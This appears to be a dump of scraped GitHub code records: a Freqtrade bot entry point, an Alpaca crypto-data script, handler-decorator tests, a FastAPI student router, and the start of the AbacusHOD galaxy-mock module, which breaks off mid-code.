"line_number": 32, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 36, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 38, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 41, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 44, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 45, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 46, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 47, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 50, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 51, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 52, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 53, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 56, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 57, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 58, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 59, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 61, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 62, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 63, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 66, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 67, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 68, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 69, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 71, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 73, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 74, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 76, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 77, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 78, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 79, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 80, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 81, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 83, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 85, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 86, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 89, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 90, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 91, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 92, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 94, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 96, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 97, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 100, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 101, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 102, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 103, "usage_type": "call"}, {"api_name": "guizero.Text", "line_number": 104, "usage_type": "call"}, {"api_name": "guizero.Slider", "line_number": 105, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 107, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 109, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 110, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 112, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "guizero.ListBox", "line_number": 115, "usage_type": "call"}, {"api_name": "guizero.CheckBox", "line_number": 117, "usage_type": "call"}, {"api_name": "guizero.CheckBox", "line_number": 119, "usage_type": "call"}, {"api_name": "guizero.CheckBox", "line_number": 120, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 121, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 122, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 123, "usage_type": "call"}, {"api_name": "guizero.PushButton", "line_number": 124, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "guizero.ListBox", "line_number": 131, "usage_type": "call"}, {"api_name": "guizero.ListBox", "line_number": 132, "usage_type": "call"}, {"api_name": "guizero.info", "line_number": 180, "usage_type": "call"}, {"api_name": "tensorflow.config.experimental.get_device_details", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tensorflow.config.list_physical_devices", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 203, "usage_type": "attribute"}, {"api_name": "guizero.ListBox", "line_number": 206, "usage_type": "call"}]} +{"seq_id": "36278723624", "text": "#!/usr/bin/env python3\n\"\"\"\nMain Freqtrade bot script.\nRead the documentation to know what cli arguments you need.\n\"\"\"\nimport logging\nimport sys\nfrom argparse import Namespace\nfrom typing import List\n\nfrom freqtrade import OperationalException\nfrom freqtrade.arguments import Arguments\nfrom freqtrade.configuration import set_loggers\nfrom freqtrade.worker import Worker\n\n\nlogger = logging.getLogger('freqtrade')\n\n\ndef main(sysargv: List[str]) -> None:\n \"\"\"\n This function will initiate the bot and start the trading loop.\n :return: None\n \"\"\"\n arguments = Arguments(\n sysargv,\n 'Free, open source crypto trading bot'\n )\n args: Namespace = arguments.get_parsed_arg()\n\n # A subcommand has been issued.\n # Means if Backtesting or Hyperopt have been called we exit the bot\n if hasattr(args, 'func'):\n args.func(args)\n return\n\n worker = None\n return_code = 1\n try:\n # Load and run worker\n worker = Worker(args)\n worker.run()\n\n except KeyboardInterrupt:\n logger.info('SIGINT received, aborting ...')\n return_code = 0\n except OperationalException as e:\n logger.error(str(e))\n return_code = 2\n except BaseException:\n logger.exception('Fatal exception!')\n finally:\n if worker:\n worker.exit()\n sys.exit(return_code)\n\n\nif __name__ == '__main__':\n set_loggers()\n main(sys.argv[1:])\n", "repo_name": "prakashrx/freqtrade", "sub_path": "freqtrade/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "freqtrade.arguments.Arguments", "line_number": 25, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 29, "usage_type": "name"}, {"api_name": "freqtrade.worker.Worker", "line_number": 41, "usage_type": "call"}, {"api_name": "freqtrade.OperationalException", "line_number": 47, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 55, "usage_type": "call"}, {"api_name": "freqtrade.configuration.set_loggers", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "13023544409", "text": "from alpaca.data.requests import CryptoBarsRequest\nfrom alpaca.data.timeframe import TimeFrame\nfrom alpaca.data.historical import CryptoHistoricalDataClient\nimport datetime\n\n# No keys required for crypto data\nclient = CryptoHistoricalDataClient()\n# Creating request object\nrequest_params = CryptoBarsRequest(\n symbol_or_symbols=[\"BTC/USD\"],\n timeframe=TimeFrame.Day,\n start= datetime.datetime(2022, 7, 1), \n end= datetime.datetime(2022, 8, 1)\n )\n\nbtc_bars = client.get_crypto_bars(request_params)\n\n# Convert to dataframe\nbtc_bars.df\n\nprint(btc_bars)", "repo_name": "jayd-lee/Recession-Analysis", "sub_path": "crypto_history.py", "file_name": "crypto_history.py", "file_ext": "py", "file_size_in_byte": 664, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "alpaca.data.historical.CryptoHistoricalDataClient", "line_number": 7, "usage_type": "call"}, {"api_name": "alpaca.data.requests.CryptoBarsRequest", "line_number": 9, "usage_type": "call"}, {"api_name": "alpaca.data.timeframe.TimeFrame.Day", "line_number": 11, "usage_type": "attribute"}, {"api_name": "alpaca.data.timeframe.TimeFrame", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "4033096347", "text": "from dataclasses import dataclass\n\nimport pytest\n\nfrom seedwork.application.commands import Command\nfrom seedwork.application.decorators import command_handler, query_handler, registry\nfrom seedwork.application.queries import Query\n\n\n@pytest.mark.unit\ndef test_command_handler_decorator_registers_command_handler():\n registry.clear()\n\n @dataclass\n class FooCommand(Command):\n ...\n\n @command_handler\n def foo_command_handler(command: FooCommand):\n ...\n\n assert registry.get_command_handler_for(FooCommand) == foo_command_handler\n assert registry.get_command_handler_parameters_for(FooCommand) == {}\n\n\n@pytest.mark.unit\ndef test_command_handler_decorator_does_not_register_command_handler_if_type_mismatch():\n registry.clear()\n\n @dataclass\n class FooCommand(Command):\n ...\n\n @dataclass\n class BarCommand(Command):\n ...\n\n @command_handler\n def foo_command_handler(command: BarCommand):\n ...\n\n assert FooCommand not in registry.command_handlers\n\n\n@pytest.mark.unit\ndef test_query_handler_decorator_registers_query_handler():\n registry.clear()\n\n @dataclass\n class FooQuery(Query):\n ...\n\n @query_handler\n def foo_query_handler(query: FooQuery):\n ...\n\n assert registry.get_query_handler_for(FooQuery) == foo_query_handler\n assert registry.get_query_handler_parameters_for(FooQuery) == {}\n", "repo_name": "dangnq2501/python-ddd", "sub_path": "src/seedwork/tests/application/test_decorators.py", "file_name": "test_decorators.py", "file_ext": "py", "file_size_in_byte": 1396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "seedwork.application.decorators.registry.clear", "line_number": 12, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 12, "usage_type": "name"}, {"api_name": "seedwork.application.commands.Command", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 14, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.command_handler", "line_number": 18, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_command_handler_for", "line_number": 22, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 22, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_command_handler_parameters_for", "line_number": 23, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 23, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "seedwork.application.decorators.registry.clear", "line_number": 28, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 28, "usage_type": "name"}, {"api_name": "seedwork.application.commands.Command", "line_number": 31, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 30, "usage_type": "name"}, {"api_name": "seedwork.application.commands.Command", "line_number": 35, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 34, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.command_handler", "line_number": 38, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.command_handlers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 26, "usage_type": "attribute"}, {"api_name": "seedwork.application.decorators.registry.clear", "line_number": 47, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 47, "usage_type": "name"}, {"api_name": "seedwork.application.queries.Query", "line_number": 50, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 49, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.query_handler", "line_number": 53, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_query_handler_for", "line_number": 57, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 57, "usage_type": "name"}, {"api_name": "seedwork.application.decorators.registry.get_query_handler_parameters_for", "line_number": 58, "usage_type": "call"}, {"api_name": "seedwork.application.decorators.registry", "line_number": 58, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 45, "usage_type": "attribute"}]} +{"seq_id": "26559888121", "text": "from fastapi import APIRouter, Depends\n\nfrom core.student_handler import StudentHandler\nfrom schema.student_schema import *\n\nrouter = APIRouter(prefix='/student')\n\n\n@router.get('/info')\ndef create_item():\n result = {'result': 'vicky'}\n return result\n\n\n@router.get('/info/{user_id}')\ndef get_info(common: StudentInfoSchema = Depends(StudentInfoSchema)):\n result = StudentHandler.get_user(user_id=common.user_id)\n return result\n\n\n@router.post('/add-user')\ndef add_info(common: StudentBasicSchema = Depends(StudentBasicSchema)):\n result = StudentHandler.add_user(\n name=common.name,\n gender=common.gender,\n grade=common.grade,\n phone_number=common.phone_number,\n )\n return result\n\n\n@router.delete('delete/{name}')\ndef delete_info(common: StudentSchema = Depends(StudentSchema)):\n result = StudentHandler.del_user(name=common.name)\n return result\n\n\n@router.put('update/{id}')\ndef update_info(common: StudentSchema = Depends(StudentSchema)):\n result = StudentHandler.update_info(name=common.name)\n return result\n\n", "repo_name": "pockydog/fastapi", "sub_path": "src/controllers/student_routes.py", "file_name": "student_routes.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.APIRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 16, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.get_user", "line_number": 17, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 17, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 22, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.add_user", "line_number": 23, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 33, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.del_user", "line_number": 34, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 34, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 39, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler.update_info", "line_number": 40, "usage_type": "call"}, {"api_name": "core.student_handler.StudentHandler", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "23724975213", "text": "\"\"\"\nThe AbacusHOD module loads halo catalogs from the AbacusSummit \nsimulations and outputs multi-tracer mock galaxy catalogs. \nThe code is highly efficient and contains a large set of HOD\nextensions such as secondary biases (assembly biases),\nvelocity biases, and satellite profile flexibilities. The baseline \nHODs are based on those from `Zheng et al. 2007 `_ \nand `Alam et al. 2020 `_. \nThe HOD extensions are first explained in `Yuan et al. 2018 `_, and more \nrecently summarized in `Yuan et al. 2020b `_ . \nThis HOD code also supports RSD and incompleteness. The code is fast, \ncompleteling a :math:`(2Gpc/h)^3` volume in 80ms per tracer on a 32 core\ndesktop system, and the performance should be scalable. The module also\nprovides efficient correlation function and power spectrum calculators.\nThis module is particularly suited for efficiently sampling HOD parameter\nspace. We provide examples of docking it onto ``emcee`` and ``dynesty``\nsamplers. \n\nThe module defines one class, ``AbacusHOD``, whose constructor \ntakes the path to the simulation volume, and a set of HOD \nparameters, and runs the ``staging`` function to compile the \nsimulation halo catalog as a set of arrays that are saved on\nmemory. The ``run_hod`` function can then be called to \ngenerate galaxy catalogs. \n\nThe output takes the format of a dictionary of dictionaries,\nwhere each subdictionary corresponds to a different tracer. \nCurrently, we have enabled tracer types: LRG, ELG, and QSO.\nEach subdictionary contains all the mock galaxies of that \ntracer type, recording their properties with keys ``x``, ``y``\n, ``z``, ``vx``, ``vy``, ``vz``, ``mass``, ``id``, ``Ncent``.\nThe coordinates are in Mpc/h, and the velocities are in km/s.\nThe ``mass`` refers to host halo mass and is in units of Msun/h.\nThe ``id`` refers to halo id, and the ``Ncent`` key refers to number of\ncentral galaxies for that tracer. The first ``Ncent`` galaxies \nin the catalog are always centrals and the rest are satellites. \n\nThe galaxies can be written to disk by setting the \n``write_to_disk`` flag to ``True`` in the argument of \n``run_hod``. However, the I/O is slow and the``write_to_disk`` \nflag defaults to ``False``.\n\nThe core of the AbacusHOD code is a two-pass memory-in-place algorithm.\nThe first pass of the halo+particle subsample computes the number\nof galaxies generated in total. Then an empty array for these galaxies \nis allocated in memory, which is then filled on the second pass of \nthe halos+particles. Each pass is accelerated with numba parallel.\nThe default threading is set to 16. \n\n\nTheory\n======\nThe baseline HOD for LRGs comes from Zheng et al. 2007:\n\n.. math:: \\\\bar{n}_{\\\\mathrm{cent}}(M) = \\\\frac{1}{2}\\\\mathrm{erfc} \\\\left[\\\\frac{\\\\ln(M_{\\\\mathrm{cut}}/M)}{\\\\sqrt{2}\\\\sigma}\\\\right],\n.. math:: \\\\bar{n}_{\\\\textrm{sat}}(M) = \\\\left[\\\\frac{M-\\\\kappa M_{\\\\textrm{cut}}}{M_1}\\\\right]^{\\\\alpha}\\\\bar{n}_{\\\\mathrm{cent}}(M),\n\nThe baseline HOD for ELGs and QSOs \ncomes from Alam et al. 2020. The actual calculation\nis complex and we refer the readers \nto section 3 of `said paper `_ for details. \n\nIn the baseline implementation, the central galaxy is assigned to the center \nof mass of the halo, with the velocity vector also set to that of the center \nof mass of the halo. Satellite galaxies are assigned to particles of the \nhalo with equal weights. When multiple tracers are enabled, each halo/particle\ncan only host a single tracer type. However, we have not yet implemented any\nprescription of conformity. \n\nThe secondary bias (assembly bias) extensions follow the recipes described in \n`Xu et al. 2020 `_ , where the secondary halo\nproperty (concentration or local overdensity) is directly tied to the mass \nparameters in the baseline HOD (:math:`M_{\\\\mathrm{cut}}` and :math:`M_1`):\n\n.. math:: \\\\log_{10} M_{\\\\mathrm{cut}}^{\\\\mathrm{mod}} = \\\\log_{10} M_{\\\\mathrm{cut}} + A_c(c^{\\\\mathrm{rank}} - 0.5) + B_c(\\\\delta^{\\\\mathrm{rank}} - 0.5)\n.. math:: \\\\log_{10} M_{1}^{\\\\mathrm{mod}} = \\\\log_{10} M_{1} + A_s(c^{\\\\mathrm{rank}} - 0.5) + B_s(\\\\delta^{\\\\mathrm{rank}} - 0.5)\n\nwhere :math:`c` and :math:`\\\\delta` represent the halo concentration and local \noverdensity, respectively. These secondary properties are ranked within narrow\nhalo mass bins, and the rank are normalized to range from 0 to 1, as noted by \nthe :math:`\\\\mathrm{rank}` superscript. :math:`(A_c, B_c, A_s, B_s)` form the \nfour parameters describing secondary biases in the HOD model. The default for\nthese parameters are 0. \n\nThe velocity bias extension follows the common prescription as described in \n`Guo et al. 2015 `_ . \n\n.. math:: \\\\sigma_c = \\\\alpha_c \\\\sigma_h\n.. math:: v_s - v_h = \\\\alpha_s (v_p - v_h)\n\nwhere the central velocity bias parameter :math:`\\\\alpha_c` sets the ratio of\ncentral velocity dispersion vs. halo velocity dispersion. The satellite \nvelocity bias parameter :math:`\\\\alpha_c` sets the ratio between the satellite\npeculiar velocity to the particle peculiar velocity. The default for these two\nparameters are 1. \n\nWe additionaly introduce a set of satellite profile parameters \n:math:`(s, s_v, s_p, s_r)` that allow for flexibilities in how satellite \ngalaxies are distributed within a halo. They respecctively allow the galaxy\nweight per particle to depend on radial position (:math:`s`), peculair velocity\n(:math:`s_v`), perihelion distance of the particle orbit (:math:`s_p`), and\nthe radial velocity (:math:`s_v`). The default values for these parameters are\n0. A detailed description of these parameters are available in \n`Yuan et al. 2018 `_, and more \nrecently in `Yuan et al. 2020b `_ . \n\n\nSome brief examples and technical details about the module\nlayout are presented below, followed by the full module API.\n\n\nShort Example\n=============\n\nThe first step is to create the configuration file such as ``config/abacus_hod.yaml``,\nwhich provides the full customizability of the HOD code. By default, it lives in your \ncurrent work directory under a subdirectory ``./config``. A template with \ndefault settings are provided under ``abacusutils/scripts/config``.\n\nWith the first use, you should define which simulation box, which redshift,\nthe path to simulation data, the path to output datasets, the various HOD \nflags and an initial set of HOD parameters. Other decisions that need to be \nmade initially (you can always re-do this but it would take some time) include:\ndo you only want LRGs or do you want other tracers as well? \nDo you want to enable satellite profile flexibilities (the :math:`s, s_v, s_p, s_r`\nparameters)? If so, you need to turn on ``want_ranks`` flag in the config file. \nIf you want to enable secondary bias based on local environment, what scale \nradius do you want the environment do be defined in, this is set by the \n``density_sigma`` flag in Mpc/h. The default value is 3. Related, the ``Ndim``\nparameter sets the grid size used to compute local density, and it should be set\nto be larger than Lbox/sigma_density. \n\nNow you need to run the ``prepare_sim`` script, this extracts the simulation outputs\nand organizes them into formats that are suited for the HOD code. This code can take \napproximately an hour depending on your configuration settings and system capabilities. \nWe recommend setting the ``Nthread_load`` parameter to ``min(sys_core_count, memoryGB_divided_by_30)``.\nYou can run ``load_sims`` on command line with ::\n python -m abacusnbody.hod.prepare_sim --path2config PATH2CONFIG\n\nWithin Python, you can run the same script with ::\n from abacusnbody.hod import prepare_sim\n \n prepare_sim.main(/path/to/config.yaml)\n\nIf your config file lives in the default location, i.e. ``./config``, then you \ncan ignore the ``-path2config`` flag. \nOnce that is finished, you can construct the ``AbacusHOD`` object and run fast \nHOD chains. A code template is given in ``abacusutils/scripts/run_hod.py`` for \nrunning a few example HODs and ``abacusutils/scripts/run_emcee.py`` for integrating \nwith the ``emcee`` sampler. \n\nTo use the given ``run_hod.py`` script to run a custom configuration file, you can\nsimply run the given script in bash ::\n python run_hod.py --path2config PATH2CONFIG\n\nYou can also consruct the AbacusHOD object yourself within Python and run HODs from\nthere. Here we show the scripts within ``run_hod.py`` for reference.::\n import os\n import glob\n import time\n import yaml\n import numpy as np\n import argparse\n\n from abacusnbody.hod.abacus_hod import AbacusHOD\n\n path2config = 'config/abacus_hod.yaml' # path to config file\n\n # load the config file and parse in relevant parameters\n config = yaml.load(open(path2config))\n sim_params = config['sim_params']\n HOD_params = config['HOD_params']\n clustering_params = config['clustering_params']\n\n # additional parameter choices\n want_rsd = HOD_params['want_rsd']\n write_to_disk = HOD_params['write_to_disk']\n\n # create a new AbacusHOD object\n newBall = AbacusHOD(sim_params, HOD_params, clustering_params)\n \n # first hod run, slow due to compiling jit, write to disk\n mock_dict = newBall.run_hod(newBall.tracers, want_rsd, write_to_disk, Nthread = 16)\n\n # run the 10 different HODs for timing\n for i in range(10):\n newBall.tracers['LRG']['alpha'] += 0.01\n print(\"alpha = \",newBall.tracers['LRG']['alpha'])\n start = time.time()\n mock_dict = newBall.run_hod(newBall.tracers, want_rsd, write_to_disk = False, Nthread = 64)\n print(\"Done iteration \", i, \"took time \", time.time() - start)\n\nThe class also provides fast 2PCF calculators. For example to compute the \nredshift-space 2PCF (:math:`\\\\xi(r_p, \\\\pi)`): ::\n\n # load the rp pi binning from the config file\n bin_params = clustering_params['bin_params']\n rpbins = np.logspace(bin_params['logmin'], bin_params['logmax'], bin_params['nbins'])\n pimax = clustering_params['pimax']\n pi_bin_size = clustering_params['pi_bin_size'] # the pi binning is configrured by pi_max and bin size\n\n mock_dict = newBall.run_hod(newBall.tracers, want_rsd, write_to_disk)\n xirppi = newBall.compute_xirppi(mock_dict, rpbins, pimax, pi_bin_size)\n\n\"\"\"\nimport os\nimport glob\nimport time\nimport timeit\nfrom pathlib import Path\n\nimport numpy as np\nimport h5py\nimport asdf\nimport argparse\nimport multiprocessing\nfrom multiprocessing import Pool\nfrom astropy.io import ascii\n\n\nfrom .GRAND_HOD import *\nfrom .tpcf_corrfunc import calc_xirppi_fast, calc_wp_fast\n# TODO B.H.: staging can be shorter and prettier; perhaps asdf for h5 and ecsv?\n\nclass AbacusHOD:\n \"\"\"\n A highly efficient multi-tracer HOD code for the AbacusSummmit simulations.\n \"\"\"\n def __init__(self, sim_params, HOD_params, clustering_params):\n \"\"\"\n Loads simulation. The ``sim_params`` dictionary specifies which simulation\n volume to load. The ``HOD_params`` specifies the HOD parameters and tracer\n configurations. The ``clustering_params`` specifies the summary statistics \n configurations. The ``HOD_params`` and ``clustering_params`` can be set to their\n default values in the ``config/abacus_hod.yaml`` file and changed later. \n The ``sim_params`` cannot be changed once the ``AbacusHOD`` object is created. \n\n Parameters\n ----------\n sim_params: dict\n Dictionary of simulation parameters. Load from ``config/abacus_hod.yaml``. The dictionary should contain the following keys:\n * ``sim_name``: str, name of the simulation volume, e.g. 'AbacusSummit_base_c000_ph006'. \n * ``sim_dir``: str, the directory that the simulation lives in, e.g. '/path/to/AbacusSummit/'. \n * ``output_dir``: str, the diretory to save galaxy to, e.g. '/my/output/galalxies'. \n * ``subsample_dir``: str, where to save halo+particle subsample, e.g. '/my/output/subsamples/'. \n * ``z_mock``: float, which redshift slice, e.g. 0.5. \n\n HOD_params: dict \n HOD parameters and tracer configurations. Load from ``config/abacus_hod.yaml``. It contains the following keys:\n * ``tracer_flags``: dict, which tracers is enabled: \n * ``LRG``: bool, default ``True``. \n * ``ELG``: bool, default ``False``. \n * ``QSO``: bool, default ``False``. \n * ``want_ranks``: bool, enable satellite profile flexibilities. If ``False``, satellite profile follows the DM, default ``True``. \n * ``want_rsd``: bool, enable RSD? default ``True``. # want RSD? \n * ``Ndim``: int, grid density for computing local environment, default 1024.\n * ``density_sigma``: float, scale radius in Mpc / h for local density definition, default 3.\n * ``write_to_disk``: bool, output to disk? default ``False``. Setting to ``True`` decreases performance. \n * ``LRG_params``: dict, HOD parameter values for LRGs. Default values are given in config file. \n * ``ELG_params``: dict, HOD parameter values for ELGs. Default values are given in config file. \n * ``QSO_params``: dict, HOD parameter values for QSOs. Default values are given in config file. \n\n clustering_params: dict\n Sumamry statistics configuration parameters. Load from ``config/abacus_hod.yaml``. It contains the following keys:\n * ``clustering_type``: str, which summary statistic to compute. Options: ``wp``, ``xirppi``, default: ``xirppi``.\n * ``bin_params``: dict, transverse scale binning. \n * ``logmin``: float, :math:`\\\\log_{10}r_{\\\\mathrm{min}} in Mpc/h.\n * ``logmax``: float, :math:`\\\\log_{10}r_{\\\\mathrm{max}} in Mpc/h.\n * ``nbins``: int, number of bins.\n * ``pimax``: int, :math:`\\\\pi_{\\\\mathrm{max}}`. \n * ``pi_bin_size``: int, size of bins along of the line of sight. Need to be divisor of ``pimax``.\n\n \"\"\"\n # simulation details\n self.sim_name = sim_params['sim_name']\n self.sim_dir = sim_params['sim_dir']\n self.subsample_dir = sim_params['subsample_dir']\n self.z_mock = sim_params['z_mock']\n self.output_dir = sim_params['output_dir']\n \n # tracers\n tracer_flags = HOD_params['tracer_flags']\n tracers = {}\n for key in tracer_flags.keys():\n if tracer_flags[key]:\n tracers[key] = HOD_params[key+'_params']\n self.tracers = tracers\n\n # HOD parameter choices\n self.want_ranks = HOD_params['want_ranks']\n self.want_rsd = HOD_params['want_rsd']\n\n # clusteringparameters\n self.pimax = clustering_params['pimax']\n self.pi_bin_size = clustering_params['pi_bin_size']\n bin_params = clustering_params['bin_params']\n self.rpbins = np.logspace(bin_params['logmin'], bin_params['logmax'], bin_params['nbins'] + 1)\n self.clustering_type = clustering_params['clustering_type']\n \n # load the subsample particles\n self.halo_data, self.particle_data, self.params, self.mock_dir = self.staging()\n\n # determine the halo mass function\n self.logMbins = np.linspace(\n np.log10(np.min(self.halo_data['hmass'])), \n np.log10(np.max(self.halo_data['hmass'])), 101)\n self.deltacbins = np.linspace(-0.5, 0.5, 101)\n self.fenvbins = np.linspace(-0.5, 0.5, 101)\n\n self.halo_mass_func, edges = np.histogramdd(\n np.vstack((np.log10(self.halo_data['hmass']), self.halo_data['hdeltac'], self.halo_data['hfenv'])).T,\n bins = [self.logMbins, self.deltacbins, self.fenvbins],\n weights = self.halo_data['hmultis'])\n # print(\"tot num halos in histogram\", np.sum(self.halo_mass_func),\n # \"tot num halos in array\", np.sum(self.halo_data['hmultis']),\n # np.min(self.halo_data['hdeltac']), np.max(self.halo_data['hdeltac']),\n # np.min(self.halo_data['hfenv']), np.max(self.halo_data['hfenv']))\n\n\n\n def staging(self):\n \"\"\"\n Constructor call this function to load the halo+particle subsamples onto memory. \n \"\"\"\n # all paths relevant for mock generation\n output_dir = Path(self.output_dir)\n simname = Path(self.sim_name)\n sim_dir = Path(self.sim_dir)\n mock_dir = output_dir / simname / ('z%4.3f'%self.z_mock)\n # create mock_dir if not created\n mock_dir.mkdir(parents = True, exist_ok = True)\n subsample_dir = \\\n Path(self.subsample_dir) / simname / ('z%4.3f'%self.z_mock)\n\n # load header to read parameters\n #halo_info_fns = list((sim_dir / simname / 'halos' / ('z%4.3f'%self.z_mock) / 'halo_info').glob('*.asdf'))\n #halo_info_fns = [(sim_dir / simname / 'halos_light_cones' / ('z%4.3f'%self.z_mock) / 'lc_halo_info.asdf')]\n halo_info_fns = [(sim_dir / 'halo_light_cones' / simname / ('z%4.3f'%self.z_mock) / 'lc_halo_info.asdf')]\n f = asdf.open(halo_info_fns[0], lazy_load=True, copy_arrays=False)\n header = f['header']\n\n # constants\n params = {}\n params['z'] = self.z_mock\n params['h'] = header['H0']/100.\n params['Lbox'] = header['BoxSize'] # Mpc / h, box size\n params['Mpart'] = header['ParticleMassHMsun'] # Msun / h, mass of each particle\n params['velz2kms'] = header['VelZSpace_to_kms']/params['Lbox']\n params['origin'] = np.array(header['LightConeOrigins']).reshape(-1,3)[0]\n params['numslabs'] = 1#len(halo_info_fns)#1\n self.lbox = header['BoxSize']\n\n # count ther number of halos and particles\n Nhalos = np.empty(params['numslabs'])\n Nparts = np.empty(params['numslabs']) 